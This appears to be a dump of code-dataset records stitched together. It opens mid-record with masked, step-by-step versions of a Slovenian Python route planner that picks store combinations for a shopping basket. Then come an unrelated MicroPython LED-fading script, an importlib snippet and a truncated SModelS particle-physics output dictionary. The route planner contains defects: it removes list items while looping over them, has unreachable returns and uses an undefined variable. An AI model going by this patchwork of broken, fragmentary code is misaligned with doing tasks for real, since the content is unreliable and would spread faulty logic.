"step-1": "<mask token>\n\n\ndef kombinacije_trgovin_f(mnozica_izdelkov_v_kosarici, seznam_trgovin,\n trgovine_z_izdelki):\n generator_kombinacij = (set(itertools.compress(seznam_trgovin, el)) for\n el in itertools.product(*([[0, 1]] * len(seznam_trgovin))))\n kombinacije = []\n for mnozica_trgovin in generator_kombinacij:\n izdelki_kombinacije = set()\n for trgovina in mnozica_trgovin:\n for izdelek in trgovine_z_izdelki[trgovina]:\n izdelki_kombinacije.add(izdelek)\n if mnozica_izdelkov_v_kosarici.issubset(izdelki_kombinacije):\n kombinacije.append(mnozica_trgovin)\n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija)\n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija)\n return kombinacije\n return None\n\n\ndef razdalja(vozlisce1, vozlisce2):\n return math.sqrt((vozlisce2[1] - vozlisce1[1]) ** 2 + (vozlisce2[0] -\n vozlisce1[0]) ** 2)\n\n\n<mask token>\n\n\ndef doloci_pot(dom, seznam_izdelkov, seznam_trgovin,\n seznam_izdelkov_v_kosarici, trgovine_z_izdelki):\n vozlisca = []\n dolzine = []\n trgovine = []\n for kombinacija in kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici\n ), seznam_trgovin, trgovine_z_izdelki):\n par = doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov,\n kombinacija)\n dolzine.append(par[1])\n vozlisca.append(par[0])\n trgovine.append(kombinacija)\n if dolzine == []:\n return None\n i = numpy.argmin(dolzine)\n v = vozlisca[i]\n v.append(dom)\n obiskane_trgovine = trgovine[i]\n return v, obiskane_trgovine\n\n\ndef razporeditev(obiskane_trgovine, izdelki, slovar):\n izdelki2 = izdelki.copy()\n razporeditev = []\n for trgovina in obiskane_trgovine:\n sez = []\n for izdelek in izdelki:\n if {izdelek}.issubset(slovar[trgovina]):\n izd = podatki.id_izdelka_v_opis()[izdelek - 1]\n sez.append(izd)\n izdelki2.remove(izdelek)\n razporeditev.append([trgovina, sez])\n return razporeditev\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef kombinacije_trgovin_f(mnozica_izdelkov_v_kosarici, seznam_trgovin,\n trgovine_z_izdelki):\n generator_kombinacij = (set(itertools.compress(seznam_trgovin, el)) for\n el in itertools.product(*([[0, 1]] * len(seznam_trgovin))))\n kombinacije = []\n for mnozica_trgovin in generator_kombinacij:\n izdelki_kombinacije = set()\n for trgovina in mnozica_trgovin:\n for izdelek in trgovine_z_izdelki[trgovina]:\n izdelki_kombinacije.add(izdelek)\n if mnozica_izdelkov_v_kosarici.issubset(izdelki_kombinacije):\n kombinacije.append(mnozica_trgovin)\n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija)\n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija)\n return kombinacije\n return None\n\n\ndef razdalja(vozlisce1, vozlisce2):\n return math.sqrt((vozlisce2[1] - vozlisce1[1]) ** 2 + (vozlisce2[0] -\n vozlisce1[0]) ** 2)\n\n\ndef doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov, kombinacija):\n skupine = []\n poti = []\n for trgovina in kombinacija:\n skupine.append(podatki.lokacije(slovar_koordinat, trgovina))\n for i in skupine[0]:\n dolzina = razdalja(dom, i)\n if len(kombinacija) > 1:\n for j in skupine[1]:\n dolzina += razdalja(i, j)\n if len(kombinacija) > 2:\n for k in skupine[2]:\n dolzina += razdalja(j, k)\n if len(kombinacija) > 3:\n for m in skupine[3]:\n dolzina += razdalja(k, m)\n if len(kombinacija) > 4:\n for n in skupine[4]:\n dolzina += razdalja(m, n)\n dolzina += razdalja(n, dom)\n poti.append([[dom, i, j, k, m, n], dolzina]\n )\n dolzina = 0\n else:\n dolzina += razdalja(m, dom)\n poti.append([[dom, i, j, k, m], dolzina])\n dolzina = 0\n else:\n dolzina += razdalja(k, dom)\n poti.append([[dom, i, j, k], dolzina])\n dolzina = 0\n else:\n dolzina += razdalja(j, dom)\n poti.append([[dom, i, j], dolzina])\n dolzina = 0\n else:\n dolzina *= 2\n poti.append([[dom, i], dolzina])\n dolzina = 0\n dolzine = [el[1] for el in poti]\n if dolzine == []:\n print('Nakupa ni mogoče opraviti.')\n return None\n mini = numpy.argmin(dolzine)\n return poti[mini]\n return dolzina, sez_vozlisc\n\n\ndef doloci_pot(dom, seznam_izdelkov, seznam_trgovin,\n seznam_izdelkov_v_kosarici, trgovine_z_izdelki):\n vozlisca = []\n dolzine = []\n trgovine = []\n for kombinacija in kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici\n ), seznam_trgovin, trgovine_z_izdelki):\n par = doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov,\n kombinacija)\n dolzine.append(par[1])\n vozlisca.append(par[0])\n trgovine.append(kombinacija)\n if dolzine == []:\n return None\n i = numpy.argmin(dolzine)\n v = vozlisca[i]\n v.append(dom)\n obiskane_trgovine = trgovine[i]\n return v, obiskane_trgovine\n\n\ndef razporeditev(obiskane_trgovine, izdelki, slovar):\n izdelki2 = izdelki.copy()\n razporeditev = []\n for trgovina in obiskane_trgovine:\n sez = []\n for izdelek in izdelki:\n if {izdelek}.issubset(slovar[trgovina]):\n izd = podatki.id_izdelka_v_opis()[izdelek - 1]\n sez.append(izd)\n izdelki2.remove(izdelek)\n razporeditev.append([trgovina, sez])\n return razporeditev\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef kombinacije_trgovin_f(mnozica_izdelkov_v_kosarici, seznam_trgovin,\n trgovine_z_izdelki):\n generator_kombinacij = (set(itertools.compress(seznam_trgovin, el)) for\n el in itertools.product(*([[0, 1]] * len(seznam_trgovin))))\n kombinacije = []\n for mnozica_trgovin in generator_kombinacij:\n izdelki_kombinacije = set()\n for trgovina in mnozica_trgovin:\n for izdelek in trgovine_z_izdelki[trgovina]:\n izdelki_kombinacije.add(izdelek)\n if mnozica_izdelkov_v_kosarici.issubset(izdelki_kombinacije):\n kombinacije.append(mnozica_trgovin)\n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija)\n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija)\n return kombinacije\n return None\n\n\ndef razdalja(vozlisce1, vozlisce2):\n return math.sqrt((vozlisce2[1] - vozlisce1[1]) ** 2 + (vozlisce2[0] -\n vozlisce1[0]) ** 2)\n\n\ndef doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov, kombinacija):\n skupine = []\n poti = []\n for trgovina in kombinacija:\n skupine.append(podatki.lokacije(slovar_koordinat, trgovina))\n for i in skupine[0]:\n dolzina = razdalja(dom, i)\n if len(kombinacija) > 1:\n for j in skupine[1]:\n dolzina += razdalja(i, j)\n if len(kombinacija) > 2:\n for k in skupine[2]:\n dolzina += razdalja(j, k)\n if len(kombinacija) > 3:\n for m in skupine[3]:\n dolzina += razdalja(k, m)\n if len(kombinacija) > 4:\n for n in skupine[4]:\n dolzina += razdalja(m, n)\n dolzina += razdalja(n, dom)\n poti.append([[dom, i, j, k, m, n], dolzina]\n )\n dolzina = 0\n else:\n dolzina += razdalja(m, dom)\n poti.append([[dom, i, j, k, m], dolzina])\n dolzina = 0\n else:\n dolzina += razdalja(k, dom)\n poti.append([[dom, i, j, k], dolzina])\n dolzina = 0\n else:\n dolzina += razdalja(j, dom)\n poti.append([[dom, i, j], dolzina])\n dolzina = 0\n else:\n dolzina *= 2\n poti.append([[dom, i], dolzina])\n dolzina = 0\n dolzine = [el[1] for el in poti]\n if dolzine == []:\n print('Nakupa ni mogoče opraviti.')\n return None\n mini = numpy.argmin(dolzine)\n return poti[mini]\n return dolzina, sez_vozlisc\n\n\ndef doloci_pot(dom, seznam_izdelkov, seznam_trgovin,\n seznam_izdelkov_v_kosarici, trgovine_z_izdelki):\n vozlisca = []\n dolzine = []\n trgovine = []\n for kombinacija in kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici\n ), seznam_trgovin, trgovine_z_izdelki):\n par = doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov,\n kombinacija)\n dolzine.append(par[1])\n vozlisca.append(par[0])\n trgovine.append(kombinacija)\n if dolzine == []:\n return None\n i = numpy.argmin(dolzine)\n v = vozlisca[i]\n v.append(dom)\n obiskane_trgovine = trgovine[i]\n return v, obiskane_trgovine\n\n\ndef razporeditev(obiskane_trgovine, izdelki, slovar):\n izdelki2 = izdelki.copy()\n razporeditev = []\n for trgovina in obiskane_trgovine:\n sez = []\n for izdelek in izdelki:\n if {izdelek}.issubset(slovar[trgovina]):\n izd = podatki.id_izdelka_v_opis()[izdelek - 1]\n sez.append(izd)\n izdelki2.remove(izdelek)\n razporeditev.append([trgovina, sez])\n return razporeditev\n\n\nbaza.commit()\n<mask token>\n",
"step-4": "import itertools\nimport numpy\nimport math\nimport psycopg2\nimport podatki\nbaza = podatki.baza\ndom = podatki.preberi_lokacijo()\nseznam_trgovin = ['spar', 'mercator', 'tus', 'hofer', 'lidl']\nid_in_opis = podatki.id_izdelka_v_opis()\nseznam_izdelkov = [el[0] for el in id_in_opis]\nmnozica_izdelkov = set(seznam_izdelkov)\ntrgovine_z_izdelki = podatki.trgovine_z_izdelki_f()\nseznam_izdelkov_v_kosarici = [el[3] for el in podatki.kosarica]\n<mask token>\n\n\ndef kombinacije_trgovin_f(mnozica_izdelkov_v_kosarici, seznam_trgovin,\n trgovine_z_izdelki):\n generator_kombinacij = (set(itertools.compress(seznam_trgovin, el)) for\n el in itertools.product(*([[0, 1]] * len(seznam_trgovin))))\n kombinacije = []\n for mnozica_trgovin in generator_kombinacij:\n izdelki_kombinacije = set()\n for trgovina in mnozica_trgovin:\n for izdelek in trgovine_z_izdelki[trgovina]:\n izdelki_kombinacije.add(izdelek)\n if mnozica_izdelkov_v_kosarici.issubset(izdelki_kombinacije):\n kombinacije.append(mnozica_trgovin)\n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija)\n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija\n ) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija)\n return kombinacije\n return None\n\n\ndef razdalja(vozlisce1, vozlisce2):\n return math.sqrt((vozlisce2[1] - vozlisce1[1]) ** 2 + (vozlisce2[0] -\n vozlisce1[0]) ** 2)\n\n\ndef doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov, kombinacija):\n skupine = []\n poti = []\n for trgovina in kombinacija:\n skupine.append(podatki.lokacije(slovar_koordinat, trgovina))\n for i in skupine[0]:\n dolzina = razdalja(dom, i)\n if len(kombinacija) > 1:\n for j in skupine[1]:\n dolzina += razdalja(i, j)\n if len(kombinacija) > 2:\n for k in skupine[2]:\n dolzina += razdalja(j, k)\n if len(kombinacija) > 3:\n for m in skupine[3]:\n dolzina += razdalja(k, m)\n if len(kombinacija) > 4:\n for n in skupine[4]:\n dolzina += razdalja(m, n)\n dolzina += razdalja(n, dom)\n poti.append([[dom, i, j, k, m, n], dolzina]\n )\n dolzina = 0\n else:\n dolzina += razdalja(m, dom)\n poti.append([[dom, i, j, k, m], dolzina])\n dolzina = 0\n else:\n dolzina += razdalja(k, dom)\n poti.append([[dom, i, j, k], dolzina])\n dolzina = 0\n else:\n dolzina += razdalja(j, dom)\n poti.append([[dom, i, j], dolzina])\n dolzina = 0\n else:\n dolzina *= 2\n poti.append([[dom, i], dolzina])\n dolzina = 0\n dolzine = [el[1] for el in poti]\n if dolzine == []:\n print('Nakupa ni mogoče opraviti.')\n return None\n mini = numpy.argmin(dolzine)\n return poti[mini]\n return dolzina, sez_vozlisc\n\n\ndef doloci_pot(dom, seznam_izdelkov, seznam_trgovin,\n seznam_izdelkov_v_kosarici, trgovine_z_izdelki):\n vozlisca = []\n dolzine = []\n trgovine = []\n for kombinacija in kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici\n ), seznam_trgovin, trgovine_z_izdelki):\n par = doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov,\n kombinacija)\n dolzine.append(par[1])\n vozlisca.append(par[0])\n trgovine.append(kombinacija)\n if dolzine == []:\n return None\n i = numpy.argmin(dolzine)\n v = vozlisca[i]\n v.append(dom)\n obiskane_trgovine = trgovine[i]\n return v, obiskane_trgovine\n\n\ndef razporeditev(obiskane_trgovine, izdelki, slovar):\n izdelki2 = izdelki.copy()\n razporeditev = []\n for trgovina in obiskane_trgovine:\n sez = []\n for izdelek in izdelki:\n if {izdelek}.issubset(slovar[trgovina]):\n izd = podatki.id_izdelka_v_opis()[izdelek - 1]\n sez.append(izd)\n izdelki2.remove(izdelek)\n razporeditev.append([trgovina, sez])\n return razporeditev\n\n\nbaza.commit()\nslovar_koordinat = podatki.slovar_koordinat\nkombinacije_trgovin = kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici),\n seznam_trgovin, trgovine_z_izdelki)\npot, obiskane_trgovine = doloci_pot(dom, seznam_izdelkov, seznam_trgovin,\n seznam_izdelkov_v_kosarici, trgovine_z_izdelki)\nrazpredelnica = razporeditev(obiskane_trgovine, seznam_izdelkov_v_kosarici,\n podatki.trgovine_z_izdelki)\n",
"step-5": "import itertools\nimport numpy\nimport math\nimport psycopg2\nimport podatki\n\nbaza = podatki.baza\ndom = podatki.preberi_lokacijo()\nseznam_trgovin =[\"spar\", \"mercator\", \"tus\", \"hofer\", \"lidl\"]\nid_in_opis = podatki.id_izdelka_v_opis()\nseznam_izdelkov = [el[0] for el in id_in_opis] #['cokolada', 'sladoled', ...]\nmnozica_izdelkov = set(seznam_izdelkov)\ntrgovine_z_izdelki = podatki.trgovine_z_izdelki_f() #slovar: {'trgovina':['id1', 'id2'],...}\nseznam_izdelkov_v_kosarici = [el[3] for el in podatki.kosarica]\n'''\ndef zemljevid_trgovin(trgovine):\n sez = []\n for trgovina in trgovine:\n sez.append([trgovina, [])\n\ndef kombinacije_trgovin(seznam_izdelkov):\n sez_kombinacij = []\n for trgovina in trgovine:\n kombinacija = []\n izdelki = sez_izdelkov\n for izdelek in izdelki:\n if izdelek in trgovina:\n izdelki = izdelki.remove(izdelek)\n'''\ndef kombinacije_trgovin_f(mnozica_izdelkov_v_kosarici, seznam_trgovin, trgovine_z_izdelki):\n \n generator_kombinacij = (set(itertools.compress(seznam_trgovin, el)) for el in itertools.product(*[[0,1]]*len(seznam_trgovin)))\n kombinacije = []\n for mnozica_trgovin in generator_kombinacij:\n izdelki_kombinacije = set()\n for trgovina in mnozica_trgovin:\n for izdelek in trgovine_z_izdelki[trgovina]:\n izdelki_kombinacije.add(izdelek) #množica vseh izdelkov, ki jih lahko dobiš v danih trgovinah\n if mnozica_izdelkov_v_kosarici.issubset(izdelki_kombinacije):\n kombinacije.append(mnozica_trgovin) \n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija)\n for kombinacija in kombinacije:\n for kombinacija2 in kombinacije:\n if kombinacija.issubset(kombinacija2) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija2)\n elif kombinacija2.issubset(kombinacija) and kombinacija != kombinacija2:\n kombinacije.remove(kombinacija) \n return kombinacije\n \n \n return None\n\ndef razdalja(vozlisce1, vozlisce2):\n return math.sqrt((vozlisce2[1] - vozlisce1[1]) ** 2 + (vozlisce2[0] - vozlisce1[0]) ** 2)\n\n#dom = [x,y] \ndef doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov, kombinacija):\n skupine = [] #skupine vozlišč iste trgovine\n poti = []\n for trgovina in kombinacija:\n skupine.append(podatki.lokacije(slovar_koordinat, trgovina))\n for i in skupine[0]: #skupine[0] je seznam lokacij ene vrste trgovin\n dolzina = razdalja(dom, i)\n if len(kombinacija) > 1:\n for j in skupine[1]:\n dolzina += razdalja(i, j)\n if len(kombinacija) > 2:\n for k in skupine[2]:\n dolzina += razdalja(j, k)\n if len(kombinacija) > 3:\n for m in skupine[3]:\n dolzina += razdalja(k, m)\n if len(kombinacija) > 4:\n for n in skupine[4]:\n dolzina += razdalja(m, n)\n dolzina += razdalja(n, dom)\n poti.append([[dom, i, j, k, m, n], dolzina])\n dolzina = 0\n else:\n dolzina += razdalja(m, dom)\n poti.append([[dom, i, j, k, m], dolzina])\n dolzina = 0\n else:\n dolzina += razdalja(k, dom)\n poti.append([[dom, i, j, k], dolzina])\n dolzina = 0\n else:\n dolzina += razdalja(j, dom)\n poti.append([[dom, i, j], dolzina])\n dolzina = 0\n else:\n dolzina *= 2\n poti.append([[dom, i], dolzina])\n dolzina = 0\n dolzine = [el[1] for el in poti]\n if dolzine == []:\n print(\"Nakupa ni mogoče opraviti.\")\n return None\n mini = numpy.argmin(dolzine)\n return poti[mini] #[[pot], dolzina]\n \n\n \n return (dolzina, sez_vozlisc)\n\ndef doloci_pot(dom, seznam_izdelkov, seznam_trgovin, seznam_izdelkov_v_kosarici, trgovine_z_izdelki):\n vozlisca = []\n dolzine = []\n trgovine = []\n for kombinacija in kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici), seznam_trgovin, trgovine_z_izdelki):\n par = doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov, kombinacija)\n dolzine.append(par[1])\n vozlisca.append(par[0])\n trgovine.append(kombinacija)\n if dolzine == []:\n return None\n i = numpy.argmin(dolzine)\n v = vozlisca[i]\n v.append(dom)\n obiskane_trgovine = trgovine[i]\n return v, obiskane_trgovine\n\ndef razporeditev(obiskane_trgovine, izdelki, slovar):\n izdelki2 = izdelki.copy()\n razporeditev = []\n for trgovina in obiskane_trgovine:\n sez = []\n for izdelek in izdelki:\n if {izdelek}.issubset(slovar[trgovina]):\n izd = podatki.id_izdelka_v_opis()[izdelek-1]\n sez.append(izd)\n izdelki2.remove(izdelek)\n razporeditev.append([trgovina, sez])\n return razporeditev\n \nbaza.commit()\n\nslovar_koordinat = podatki.slovar_koordinat\n\nkombinacije_trgovin = kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici), seznam_trgovin, trgovine_z_izdelki)\n#print(kombinacije_trgovin)'\npot, obiskane_trgovine = doloci_pot(dom, seznam_izdelkov, seznam_trgovin, seznam_izdelkov_v_kosarici, trgovine_z_izdelki)\nrazpredelnica = razporeditev(obiskane_trgovine, seznam_izdelkov_v_kosarici, podatki.trgovine_z_izdelki)\n",
"step-ids": [
4,
5,
6,
8,
9
]
}
|
[
4,
5,
6,
8,
9
] |
from machine import Pin, PWM
import time
# externe LED zit op pin D1 (GPIO5)
PinNum = 5
# pwm initialisatie
pwm1 = PWM(Pin(PinNum))
pwm1.freq(60)
pwm1.duty(0)
step = 100
for i in range(10):
# oplichten
while step < 1000:
pwm1.duty(step)
time.sleep_ms(500)
step+=100
# uitdoven
while step > 0:
pwm1.duty(step)
time.sleep_ms(500)
step-=200
# pwm resetten
pwm1.deinit()
|
normal
|
{
"blob_id": "9f31694d80f2dcc50a76b32aa296871694d3644d",
"index": 7838,
"step-1": "<mask token>\n",
"step-2": "<mask token>\npwm1.freq(60)\npwm1.duty(0)\n<mask token>\nfor i in range(10):\n while step < 1000:\n pwm1.duty(step)\n time.sleep_ms(500)\n step += 100\n while step > 0:\n pwm1.duty(step)\n time.sleep_ms(500)\n step -= 200\npwm1.deinit()\n",
"step-3": "<mask token>\nPinNum = 5\npwm1 = PWM(Pin(PinNum))\npwm1.freq(60)\npwm1.duty(0)\nstep = 100\nfor i in range(10):\n while step < 1000:\n pwm1.duty(step)\n time.sleep_ms(500)\n step += 100\n while step > 0:\n pwm1.duty(step)\n time.sleep_ms(500)\n step -= 200\npwm1.deinit()\n",
"step-4": "from machine import Pin, PWM\nimport time\nPinNum = 5\npwm1 = PWM(Pin(PinNum))\npwm1.freq(60)\npwm1.duty(0)\nstep = 100\nfor i in range(10):\n while step < 1000:\n pwm1.duty(step)\n time.sleep_ms(500)\n step += 100\n while step > 0:\n pwm1.duty(step)\n time.sleep_ms(500)\n step -= 200\npwm1.deinit()\n",
"step-5": "from machine import Pin, PWM\nimport time\n\n# externe LED zit op pin D1 (GPIO5)\nPinNum = 5\n\n# pwm initialisatie\npwm1 = PWM(Pin(PinNum))\npwm1.freq(60)\npwm1.duty(0)\n\nstep = 100\nfor i in range(10):\n # oplichten\n while step < 1000:\n pwm1.duty(step)\n time.sleep_ms(500)\n step+=100\n # uitdoven \n while step > 0:\n pwm1.duty(step)\n time.sleep_ms(500)\n step-=200\n\n# pwm resetten \npwm1.deinit()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import importlib
if __name__ == '__main__':
module = importlib.import_module('UserFile')
print(module.if_new_message)
print(module.ID)
|
normal
|
{
"blob_id": "8a773448383a26610f4798e12fb514248e71dc4b",
"index": 698,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n module = importlib.import_module('UserFile')\n print(module.if_new_message)\n print(module.ID)\n",
"step-3": "import importlib\nif __name__ == '__main__':\n module = importlib.import_module('UserFile')\n print(module.if_new_message)\n print(module.ID)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
smodelsOutput = {'OutputStatus': {'sigmacut': 0.01, 'minmassgap': 5.0,
'maxcond': 0.2, 'ncpus': 1, 'file status': 1, 'decomposition status': 1,
'warnings': 'Input file ok', 'input file':
'inputFiles/scanExample/slha/100968509.slha', 'database version':
'1.2.0', 'smodels version': '1.2.0rc'}, 'ExptRes': [{'maxcond': 0.0,
'theory prediction (fb)': 728.7491431153657, 'upper limit (fb)':
44.22312638711652, 'expected upper limit (fb)': None, 'TxNames': ['T2'],
'Mass (GeV)': [[541.4, 57.4], [541.4, 57.4]], 'AnalysisID':
'CMS-SUS-16-033', 'DataSetID': None, 'AnalysisSqrts (TeV)': 13.0,
'lumi (fb-1)': 35.9, 'dataType': 'upperLimit', 'r': 16.478915053090216,
'r_expected': None}, {'maxcond': 0.0, 'theory prediction (fb)':
728.7491431153657, 'upper limit (fb)': 55.74859999999999,
'expected upper limit (fb)': None, 'TxNames': ['T2'], 'Mass (GeV)': [[
541.4, 57.4], [541.4, 57.4]], 'AnalysisID': 'CMS-SUS-16-036',
'DataSetID': None, 'AnalysisSqrts (TeV)': 13.0, 'lumi (fb-1)': 35.9,
'dataType': 'upperLimit', 'r': 13.072061775817971, 'r_expected': None},
{'maxcond': 0.0, 'theory prediction (fb)': 132.83976207255284,
'upper limit (fb)': 36.140272, 'expected upper limit (fb)': None,
'TxNames': ['T2'], 'Mass (GeV)': [[541.4, 57.4], [541.4, 57.4]],
'AnalysisID': 'CMS-SUS-13-019', 'DataSetID': None,
'AnalysisSqrts (TeV)': 8.0, 'lumi (fb-1)': 19.5, 'dataType':
'upperLimit', 'r': 3.675671341725177, 'r_expected': None}, {'maxcond':
0.0, 'theory prediction (fb)': 0.9562482176560967, 'upper limit (fb)':
0.274, 'expected upper limit (fb)': 0.154, 'TxNames': ['T2', 'T5',
'TChiZZ'], 'Mass (GeV)': None, 'AnalysisID': 'CMS-SUS-13-012',
'DataSetID': '6NJet8_1250HT1500_450MHTinf', 'AnalysisSqrts (TeV)': 8.0,
'lumi (fb-1)': 19.5, 'dataType': 'efficiencyMap', 'r':
3.489956998744878, 'r_expected': 6.209404010753875, 'chi2':
13.063642260056689, 'likelihood': 6.008581252238334e-05}, {'maxcond':
0.0, 'theory prediction (fb)': 132.83976207255284, 'upper limit (fb)':
58.50226240000003, 'expected upper limit (fb)': None, 'TxNames': ['T2'],
'Mass (GeV)': [[541.4, 57.4], [541.4, 57.4]], 'AnalysisID':
'ATLAS-SUSY-2013-02', 'DataSetID': None, 'AnalysisSqrts (TeV)': 8.0,
'lumi (fb-1)': 20.3, 'dataType': 'upperLimit', 'r': 2.270677348583237,
'r_expected': None}, {'maxcond': 0.0, 'theory prediction (fb)':
9.084517413967422, 'upper limit (fb)': 4.2419,
'expected upper limit (fb)': 5.5524, 'TxNames': ['T2'], 'Mass (GeV)': [
[541.4, 57.4], [541.4, 57.4]], 'AnalysisID': 'ATLAS-SUSY-2013-02',
'DataSetID': 'SR2jm', 'AnalysisSqrts (TeV)': 8.0, 'lumi (fb-1)': 20.3,
'dataType': 'efficiencyMap', 'r': 2.141615175739037, 'r_expected':
1.6361424634333661, 'chi2': 11.844156696751806, 'likelihood':
3.1390377843658383e-07}, {'maxcond': 0.0, 'theory prediction (fb)':
132.83976207255284, 'upper limit (fb)': 67.69032800000002,
'expected upper limit (fb)': 67.79354400000003, 'TxNames': ['T2'],
'Mass (GeV)': [[541.4, 57.4], [541.4, 57.4]], 'AnalysisID':
'CMS-SUS-12-028', 'DataSetID': None, 'AnalysisSqrts (TeV)': 8.0,
'lumi (fb-1)': 11.7, 'dataType': 'upperLimit', 'r': 1.9624629691933657,
'r_expected': 1.9594751097914693}, {'maxcond': 0.0,
'theory prediction (fb)': 0.7285976790027092, 'upper limit (fb)': 0.506,
'expected upper limit (fb)': 0.464, 'TxNames': ['T5'], 'Mass (GeV)': [[
881.8, 541.4, 57.4], [881.8, 541.4, 57.4]], 'AnalysisID':
'ATLAS-SUSY-2013-04', 'DataSetID': 'GtGrid_SR_7ej80_0bjet',
'AnalysisSqrts (TeV)': 8.0, 'lumi (fb-1)': 20.3, 'dataType':
'efficiencyMap', 'r': 1.4399163616654331, 'r_expected':
1.5702536185403213, 'chi2': 7.225026655774327, 'likelihood':
0.0005573265805884188}, {'maxcond': 0.0, 'theory prediction (fb)':
132.83976207255284, 'upper limit (fb)': 97.78847200000001,
'expected upper limit (fb)': 69.450736, 'TxNames': ['T2'], 'Mass (GeV)':
[[541.4, 57.4], [541.4, 57.4]], 'AnalysisID': 'CMS-SUS-13-012',
'DataSetID': None, 'AnalysisSqrts (TeV)': 8.0, 'lumi (fb-1)': 19.5,
'dataType': 'upperLimit', 'r': 1.358439899465377, 'r_expected':
1.9127192845379328}, {'maxcond': 0.0, 'theory prediction (fb)':
4.245413557698921, 'upper limit (fb)': 4.0, 'expected upper limit (fb)':
4.16, 'TxNames': ['T2'], 'Mass (GeV)': [[541.4, 57.4], [541.4, 57.4]],
'AnalysisID': 'ATLAS-CONF-2013-047', 'DataSetID': 'C Medium',
'AnalysisSqrts (TeV)': 8.0, 'lumi (fb-1)': 20.3, 'dataType':
'efficiencyMap', 'r': 1.0613533894247302, 'r_expected':
1.0205321052160867, 'chi2': 2.344696287811548, 'likelihood':
8.123400145704854e-05}, {'maxcond': 0.0, 'theory prediction (fb)':
284.6597475, 'upper limit (fb)': 1041.0116, 'expected upper limit (fb)':
None, 'TxNames': ['TChiWZ'], 'Mass (GeV)': [[163.6, 57.4], [165.0, 57.4
]], 'AnalysisID': 'ATLAS-SUSY-2013-12', 'DataSetID': None,
'AnalysisSqrts (TeV)': 8.0, 'lumi (fb-1)': 20.3, 'dataType':
'upperLimit', 'r': 0.2734453175161545, 'r_expected': None}, {'maxcond':
0.0, 'theory prediction (fb)': 169.351124, 'upper limit (fb)': 1582.346,
'expected upper limit (fb)': None, 'TxNames': ['TChiWW'], 'Mass (GeV)':
[[163.6, 57.4], [163.6, 57.4]], 'AnalysisID': 'ATLAS-SUSY-2013-11',
'DataSetID': None, 'AnalysisSqrts (TeV)': 8.0, 'lumi (fb-1)': 20.3,
'dataType': 'upperLimit', 'r': 0.10702534338254717, 'r_expected': None},
{'maxcond': 0.0, 'theory prediction (fb)': 0.10289469462216802,
'upper limit (fb)': 1.07, 'expected upper limit (fb)': 1.17, 'TxNames':
['TChiWW'], 'Mass (GeV)': [[163.6, 57.4], [163.6, 57.4]], 'AnalysisID':
'ATLAS-SUSY-2013-11', 'DataSetID': 'WWa-DF', 'AnalysisSqrts (TeV)': 8.0,
'lumi (fb-1)': 20.3, 'dataType': 'efficiencyMap', 'r':
0.09616326600202618, 'r_expected': 0.08794418343775044, 'chi2':
0.23492769120756485, 'likelihood': 0.0021296922629215516}, {'maxcond':
0.0, 'theory prediction (fb)': 0.09049519199332233, 'upper limit (fb)':
0.97, 'expected upper limit (fb)': 0.762, 'TxNames': ['T2'],
